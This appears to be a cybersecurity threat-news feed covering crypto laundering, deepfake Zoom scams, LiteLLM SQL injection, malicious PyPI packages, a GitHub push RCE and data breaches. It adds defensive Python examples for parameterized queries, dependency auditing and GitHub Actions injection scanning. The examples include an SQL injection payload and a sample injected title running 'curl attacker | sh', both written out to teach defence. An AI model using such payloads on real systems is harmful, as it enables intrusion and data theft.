Latest Cybersecurity Threats

Real-time threat intelligence from trusted sources

Evan Tangeman, a 22-year-old from Newport Beach, California, was sentenced to 70 months in prison for laundering over $3.5 million tied to a cryptocurrency heist in which attackers stole roughly $230 million in digital assets. Tangeman helped obscure the origin of the stolen funds. The sentence is a reminder of the legal exposure of anyone who launders the proceeds of cybercrime, and the case illustrates how difficult it remains for law enforcement to trace illicit cryptocurrency flows.

Impact: Cryptocurrency, Digital Assets
Remediation: N/A

A North Korean threat group tracked as BlueNoroff is using fake Zoom calls to target cryptocurrency executives. The attackers combine stolen video footage of real people with AI-generated avatars to build convincing impersonations, then use the call to persuade the target to download malware. Because the impersonation is generated rather than staged live, the technique scales across many targets. With remote meetings now routine, social engineering of this kind is a material risk for anyone who approves transactions or holds keys in the cryptocurrency sector, and companies and individuals need to know the pattern and prepare for it.

Impact: Cryptocurrency executives and related organizations
Remediation: Confirm the identity of call participants through a separate, previously established channel (a known phone number or messaging account); treat any request made during a call to install software, run a script or "fix" a camera or audio problem as hostile; and require two-factor authentication and a second approver for sensitive transactions.

Attackers are actively exploiting a SQL injection vulnerability, tracked as CVE-2026-42208, in LiteLLM, the open-source large-language-model gateway. The flaw lets an attacker read sensitive information stored in the gateway's database, leading to unauthorized data exposure. Deployments that hold API keys, credentials or user data behind the gateway are most at risk. Because exploitation has been observed in the wild, operators should patch immediately and review their logs for signs of abuse rather than wait for further details.

Impact: LiteLLM open-source large-language model gateway
Remediation: Update LiteLLM to the fixed release as soon as possible. In code you maintain, use parameterized queries (bound parameters) rather than building SQL from untrusted input; input validation is a useful second layer but is not a substitute for parameterization.
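The remediation above turns on one distinction: SQL text built from untrusted input versus a bound parameter. The following is an added example, not LiteLLM's code; it runs both forms against an in-memory SQLite table so the injection is visible. The table, its rows and the `api_keys` schema are constructed for the demo and are not LiteLLM's schema.

```python
"""Added example (not LiteLLM's code): a string-built SQL lookup beside its
parameterized form.  Table, rows and payload are constructed for the demo."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed table: a lookup by key alias that returns a secret token.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE api_keys (key_alias TEXT, token TEXT, team TEXT)")
    conn.executemany(
        "INSERT INTO api_keys VALUES (?, ?, ?)",
        [("alice-key", "sk-alice-secret", "team-a"),
         ("bob-key", "sk-bob-secret", "team-b")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, key_alias: str) -> list[tuple]:
    # Untrusted input concatenated into the statement: the classic SQLi sink.
    # A quote in key_alias ends the string literal and the rest is parsed as SQL.
    sql = f"SELECT key_alias, token FROM api_keys WHERE key_alias = '{key_alias}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, key_alias: str) -> list[tuple]:
    # Bound parameter: the driver passes the value separately from the SQL
    # text, so it is never parsed as SQL no matter what it contains.
    return conn.execute(
        "SELECT key_alias, token FROM api_keys WHERE key_alias = ?", (key_alias,)
    ).fetchall()


# Constructed payload: closes the literal and appends an always-true clause.
PAYLOAD = "x' OR '1'='1"


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, PAYLOAD),  # every row leaks
        "safe": lookup_safe(conn, PAYLOAD),              # no such alias: []
        "legit": lookup_safe(conn, "alice-key"),         # normal lookup
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:10s} -> {rows}")
```

The vulnerable call returns both rows for the payload because the statement becomes `... WHERE key_alias = 'x' OR '1'='1'`; the parameterized call returns nothing, because the whole payload is compared as a literal alias. Escaping or validating the input would block this particular payload, but only the bound parameter removes the bug class.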

A malicious Python package named 'Elfsmasher' was found on the PyPI repository. It was built to steal sensitive information from the host and execute attacker-supplied commands. Developers who install it, believing it to be legitimate, hand the attacker a foothold on their machine and in any build that pulls it in. The incident is another example of software-supply-chain risk and of why packages need to be vetted before use. The same article also covers security incidents involving Facebook and Medtronic, part of a broader run of security challenges across sectors.

Impact: Elfsmasher package on PyPI, Python users, developers
Remediation: Install only packages you have vetted, pin exact versions and sha256 hashes in a lockfile, scan dependencies with a supply-chain security tool, and audit installed packages regularly.
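An added example (not code from the page or from any project) of the audit the remediation asks for: it reads a requirements file and flags known-bad pins, entries that are not pinned or carry no sha256 hash, and names one edit away from a well-known package. The blocklist, the list of popular names, the sample requirements text and the Elfsmasher version number in it are all constructed for the demo; in practice the blocklist would come from an advisory feed.

```python
"""Added example: audit a requirements file for supply-chain red flags.
BLOCKLIST, POPULAR and SAMPLE are constructed inputs, not real advisory data."""
import re
from typing import NamedTuple

# Constructed: (normalized name, version) pairs an advisory feed would supply.
# The elementary-data pin is the version named on this page; the Elfsmasher
# version is made up for the demo.
BLOCKLIST = {("elementary-data", "0.23.3"), ("elfsmasher", "0.1.0")}
# Constructed: a short list of well-known names used for the typosquat check.
POPULAR = ["requests", "numpy", "pandas", "urllib3", "cryptography"]


class Finding(NamedTuple):
    package: str
    reason: str


_LINE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*(==\s*([^\s\\]+))?")


def normalize(name: str) -> str:
    # PEP 503 normalization: case-insensitive, runs of '-', '_' and '.' collapse to '-'.
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a: str, b: str) -> int:
    # Levenshtein distance; a distance of 1 to a popular name is a typosquat signal.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit(requirements: str) -> list[Finding]:
    findings: list[Finding] = []
    # Join backslash continuations first so --hash options stay with their package.
    for raw in requirements.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):   # blank, comment, -r/-e options
            continue
        m = _LINE.match(line)
        if not m:
            continue
        name, version = normalize(m.group(1)), m.group(3)
        if version is None:
            findings.append(Finding(name, "not pinned with =="))
        elif (name, version) in BLOCKLIST:
            findings.append(Finding(name, f"known-malicious version {version}"))
        if "--hash=sha256:" not in line:
            findings.append(Finding(name, "no sha256 hash pin"))
        for pop in POPULAR:
            if name != pop and edit_distance(name, pop) == 1:
                findings.append(Finding(name, f"possible typosquat of {pop}"))
    return findings


# Constructed requirements file exercising every check (hash digests are dummies).
SAMPLE = """\
-r base.txt
requests==2.32.3 \\
    --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
elementary-data==0.23.3
Elfsmasher==0.1.0 --hash=sha256:1111111111111111111111111111111111111111111111111111111111111111
numpi==1.26.0          # one letter away from numpy
cryptography           # unpinned
"""

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f.package:16s} {f.reason}")
```

Only the `requests` line passes clean: it is pinned, hashed, not blocklisted and not near any other popular name. With `pip install --require-hashes -r requirements.txt`, the hash pins do the real enforcement; this script is the pre-flight check that tells you which lines are missing them.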

Researchers have disclosed a serious vulnerability in GitHub, tracked as CVE-2026-3854, that allows arbitrary code execution triggered by a single git push. The flaw affects several GitHub products, including GitHub Enterprise Cloud, GitHub Enterprise Cloud with Data Residency, and GitHub Enterprise Cloud with Enterprise. Remote code execution on the service side could lead to unauthorized access to, or tampering with, repositories. Organizations using these products should follow GitHub's guidance and confirm that the fix has been applied, since the flaw threatens the integrity of their code and data.

Impact: GitHub Enterprise Cloud, GitHub Enterprise Cloud with Data Residency, GitHub Enterprise Cloud with Enterprise
Remediation: Apply any patches or configuration changes GitHub publishes, review which accounts and integrations hold push access, and enforce branch protection and required reviews so that a single push cannot silently change protected code.

Greg Barbaccia, the Federal Chief Information Officer, has voiced caution about rolling out Anthropic's Mythos model across the federal government. He acknowledges that the model could strengthen federal cybersecurity, but notes significant uncertainty about how well it performs in practice: his experience with Mythos so far is limited to evaluations and benchmarking, which leaves open questions about real-world behaviour. The stance suggests the government is interested in adopting the technology but unwilling to deploy it without a clearer understanding of its risks and benefits, reflecting broader hesitation about integrating advanced AI into cybersecurity operations.

Impact: N/A
Remediation: N/A

In an unusual turn, two rival ransomware groups, 0APT and KryBit, have turned on each other and leaked data about one another's operations. The infighting has exposed details of infrastructure and methods, and security researchers now have access to internal documents and communications that shed light on how these groups work. Beyond revealing weaknesses inside the criminal organizations themselves, the leaked material may help law enforcement and defenders counter ransomware more effectively, and could inform new defensive strategies as the feud continues.

Impact: N/A
Remediation: N/A

Vimeo has confirmed that user data was accessed without authorization through a breach at Anodot, a vendor specializing in data anomaly detection. Vimeo has not disclosed exactly what data was accessed, so users should watch their accounts for suspicious activity. The breach is another example of the exposure created when a company shares data with a third-party service. Users are advised to change their passwords and enable two-factor authentication if they have not already done so.

Impact: Vimeo user data, Anodot customer data
Remediation: Users should update passwords and enable two-factor authentication.

Researchers have identified a serious security flaw in GitHub.com and GitHub Enterprise Server, designated CVE-2026-3854, that lets an authenticated user execute arbitrary code remotely with a single 'git push'. The command injection vulnerability carries a CVSS score of 8.7. An attacker with push access to a repository could use it to take control of the affected system. Both individual developers and organizations that rely on GitHub for version control are affected. Users are advised to apply any recommended patches as they become available and to monitor their repositories closely.

Impact: GitHub.com, GitHub Enterprise Server
Remediation: GitHub.com is patched by GitHub; administrators of GitHub Enterprise Server should upgrade to the fixed release as soon as it is published. Review who holds push access and keep that set as small as possible, since push permission is the precondition for exploitation.

A Brazilian cybercrime group known as LofyGang has returned after a three-year hiatus, launching a campaign targeting Minecraft players through a malware called LofyStealer, also referred to as GrabBot. This malicious software is disguised as a Minecraft hack named 'Slinky' and uses the official game icon to trick users into executing it. Once installed, LofyStealer can steal sensitive information from the victim's device. This resurgence is concerning for the gaming community, as it shows that cybercriminals are still active and adapting their tactics to exploit popular platforms. Players need to be cautious about downloading third-party software, especially those that claim to enhance game performance or functionality.

Impact: Minecraft players, specifically those who may download unauthorized hacks or mods
Remediation: Avoid downloading unauthorized hacks or mods, treat any 'cheat' that ships with the official game icon as suspect, and keep antivirus software up to date.

Pack2TheRoot: 12-Year-Old Linux PackageKit Flaw Enables Full Compromise

Hackread – Cybersecurity News, Data Breaches, AI and More

Researchers have disclosed a serious vulnerability in PackageKit, the package-management service used by many Linux distributions. The flaw, dubbed Pack2TheRoot, lets an attacker gain full root access and so completely compromise an affected system. Distributions that ship PackageKit, which include many popular ones, are affected. The bug is especially concerning because it has been present for more than a decade, which raises questions about how security-sensitive open-source components are reviewed and maintained. Users and administrators are urged to apply patches as their distributions publish them.

Impact: Linux distributions using PackageKit, including Fedora, Ubuntu, and others.
Remediation: Update PackageKit through your distribution's package manager as fixed builds are published.

A malicious version of the elementary-data package, 0.23.3, has been found stealing sensitive developer information and cryptocurrency wallet credentials. The attacker got in through a flaw in the project's GitHub Actions workflow: attacker-controlled input reached a shell step, letting them inject shell commands that exposed a GitHub token. Anyone who installed this version should assume their projects and financial assets may be compromised. Developers and organizations using the package need to act immediately to secure their systems. The incident is a reminder that CI pipelines and third-party packages are both part of the attack surface of a development environment.

Impact: elementary-data package version 0.23.3, GitHub Actions
Remediation: Remove version 0.23.3 of elementary-data and upgrade to a clean release. Rotate any GitHub tokens and wallet credentials that may have been exposed. Audit GitHub Actions workflows so that untrusted input (issue titles, pull-request branch names, comment bodies) is never interpolated directly into run steps, and grant workflow tokens only the permissions they need.
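The item above describes shell commands injected through a GitHub Actions script. The generic pattern behind that class of bug is a `${{ ... }}` expression carrying attacker-controlled text (an issue title, a PR branch name) expanded directly inside a `run:` step, where the runner substitutes it before the shell parses the line. The page does not say which expression the elementary-data workflow used, so the workflow below is a constructed illustration, not the project's file. The scanner is an added example, not code from the page or from any project; it uses no YAML library (PyYAML is not in the standard library) and instead finds `run:` blocks by indentation, which is enough for well-formed workflows.

```python
"""Added example: flag untrusted GitHub expression contexts expanded inside
`run:` steps.  WORKFLOW is a constructed file, not elementary-data's."""
import re
from typing import Iterator, NamedTuple

# Contexts an outside contributor controls.  Constructed list; extend as needed.
UNTRUSTED = re.compile(
    r"\bgithub\.(event\.(issue|pull_request|comment|review|discussion|commits|head_commit)\b"
    r"|head_ref\b)"
)
EXPR = re.compile(r"\$\{\{(.*?)\}\}")
RUN_KEY = re.compile(r"^(\s*)(-\s+)?run:\s*(.*)$")


class Finding(NamedTuple):
    line: int
    expression: str


def run_blocks(workflow: str) -> Iterator[tuple[int, str]]:
    """Yield (1-based line number, text) for every line that is part of a run: script."""
    lines = workflow.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        # Column of the 'run' key; continuation lines of a block scalar are indented past it.
        base = len(m.group(1)) + (len(m.group(2)) if m.group(2) else 0)
        rest = m.group(3)
        if rest and not rest.startswith(("|", ">")):
            yield i + 1, rest           # single-line `run: cmd`
            i += 1
            continue
        i += 1                          # block scalar: `run: |` or `run: >`
        while i < len(lines) and (
            not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > base
        ):
            yield i + 1, lines[i]
            i += 1


def scan(workflow: str) -> list[Finding]:
    out: list[Finding] = []
    for lineno, text in run_blocks(workflow):
        for expr in EXPR.findall(text):
            if UNTRUSTED.search(expr):
                out.append(Finding(lineno, expr.strip()))
    return out


# Constructed workflow: the first step is injectable, the second shows the fix
# (pass the value through `env:` so the shell sees a variable, not expanded text).
WORKFLOW = """\
name: triage
on: [issues, pull_request_target]
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - name: greet
        run: |
          echo "New issue: ${{ github.event.issue.title }}"
          gh pr view "${{ github.head_ref }}" || true
      - name: safe because the value arrives via an environment variable
        env:
          TITLE: ${{ github.event.issue.title }}
        run: echo "New issue: $TITLE"
"""

if __name__ == "__main__":
    for f in scan(WORKFLOW):
        print(f"line {f.line}: untrusted context in run step: {f.expression}")
```

The second step uses the same context but is not flagged: the expression sits under `env:`, so the runner puts the value into a variable and `"$TITLE"` is quoted by the shell, whereas in the first step an issue title such as `"; curl attacker | sh; echo "` becomes part of the command line. Pair this with `permissions:` blocks that limit the workflow token, so that a successful injection exposes as little as possible.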

Vimeo has confirmed a data breach affecting user and customer information. The ShinyHunters group claims to hold the stolen files and is demanding a ransom not to leak them. The breach raises concerns about the security of Vimeo's platform and the potential exposure of sensitive user information; affected individuals face risks such as identity theft, credential-stuffing and phishing built on the leaked details. How Vimeo responds to the ransom demand and secures user data will determine much of the fallout from this incident.

Impact: User accounts, customer data, personal information
Remediation: Users should change their passwords, enable two-factor authentication where available, and be wary of phishing that references their Vimeo account. Vimeo needs to establish the scope of the stolen data and notify affected users.

Recent legislation has sparked bipartisan criticism as it reauthorizes Section 702 of the Foreign Intelligence Surveillance Act for another three years. House Speaker Mike Johnson introduced this bill after a brief 10-day extension was approved, following unsuccessful attempts to secure an 18-month renewal. Critics from both political parties express concerns about privacy and the implications of ongoing surveillance practices. This legislation allows government agencies to collect foreign intelligence, but opponents argue it risks infringing on the rights of American citizens. The backlash indicates a growing unease regarding surveillance programs and their oversight, raising questions about the balance between national security and individual privacy.

Impact: Section 702 of the Foreign Intelligence Surveillance Act
Remediation: N/A

Udemy, a popular e-learning platform, has reportedly suffered a data breach involving more than 1.4 million user records. The ShinyHunters group, known for extortion tactics, claimed responsibility and is threatening to release the stolen data if Udemy does not engage in negotiations by April 27. This breach raises concerns for users about the potential exposure of personal information, which could lead to identity theft or phishing attacks. Companies like Udemy need to take swift action to protect their users and secure their systems against further attacks. The incident highlights the ongoing risks that online platforms face from cybercriminals seeking to exploit vulnerabilities for profit.

Impact: Udemy user accounts and personal information
Remediation: Udemy should enhance security measures, notify affected users, and consider engaging cybersecurity experts to assess vulnerabilities and prevent future breaches.